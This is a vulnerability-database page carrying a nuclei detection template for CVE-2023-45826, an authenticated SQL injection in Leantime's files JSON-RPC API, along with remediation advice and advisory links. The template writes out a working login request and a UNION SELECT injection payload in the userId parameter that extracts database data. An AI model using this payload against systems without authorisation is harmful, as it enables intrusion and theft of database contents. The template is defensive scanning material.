Lucene search
K

Leantime < 2.4 - Authenticated SQL Injection

šŸ—“ļøĀ 06 Jul 2026Ā 03:02:03Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 35Ā Views

Leantime 2.4 has an authenticated SQL injection vulnerability in userId parameter. Upgrade advised.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-45826
19 Oct 202322:34
–circl
CNNVD
Leantime Systems Leantime SQL Injection Vulnerability
19 Oct 202300:00
–cnnvd
CVE
CVE-2023-45826
19 Oct 202318:28
–cve
Cvelist
CVE-2023-45826 Authenticated SQL Injection in leantime
19 Oct 202318:28
–cvelist
NVD
CVE-2023-45826
19 Oct 202319:15
–nvd
OSV
CVE-2023-45826 Authenticated SQL Injection in leantime
19 Oct 202318:28
–osv
Prion
Sql injection
19 Oct 202319:15
–prion
RedhatCVE
CVE-2023-45826
23 May 202502:19
–redhatcve
Vulnrichment
CVE-2023-45826 Authenticated SQL Injection in leantime
19 Oct 202318:28
–vulnrichment
id: CVE-2023-45826

info:
  name: Leantime < 2.4 - Authenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Authenticated attackers can exploit SQL injection through the userId parameter in the files API to dump database contents, potentially exposing project information, user credentials, and sensitive business data from the Leantime system.
  remediation: |
    Update Leantime to version 2.4-beta-4 or later that uses parameterized queries for the userId variable in app/domain/files/repositories/class.files.php.
  reference:
    - https://github.com/advisories/GHSA-c39w-3pjx-qc7m
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-45826
    cwe-id: CWE-89
    epss-score: 0.01872
    epss-percentile: 0.76831
    cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: leantime
    product: leantime
    shodan-query: title:"Leantime"
  tags: cve,cve2023,leantime,authenticated,sqli,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr}}"
  hex_marker: "{{hex_encode(marker)}}"

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        redirectUrl=http%253A%252F%252Fpdt.re%253A8080%252Fdashboard%252Fhome&username={{username}}&password={{password}}&login=Login

    matchers:
      - type: word
        part: body
        words:
          - /dashboard/home

  - raw:
      - |
        POST /api/jsonrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"method": "leantime.rpc.files.getFilesByModule","jsonrpc": "2.0","id": "1","params": {"userId":"9 union select concat(0x{{hex_marker}},0x3a,user()),2,3,4,5,6,7,8,9,10,11-- -" } }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request was successful'
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        internal: false
        regex:
          - '"\w+:(.*?)\"'
        group: 1
# digest: 4b0a00483046022100eec360ba63c71ed0d30716e6e7453ba8205999ddb2633d20727002619807a9ba0221009cb9deff9aa226af91df17dfa2255c43630856ee2d5e715535f76067d704f7d2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.16.5
EPSS0.01872
SSVC
35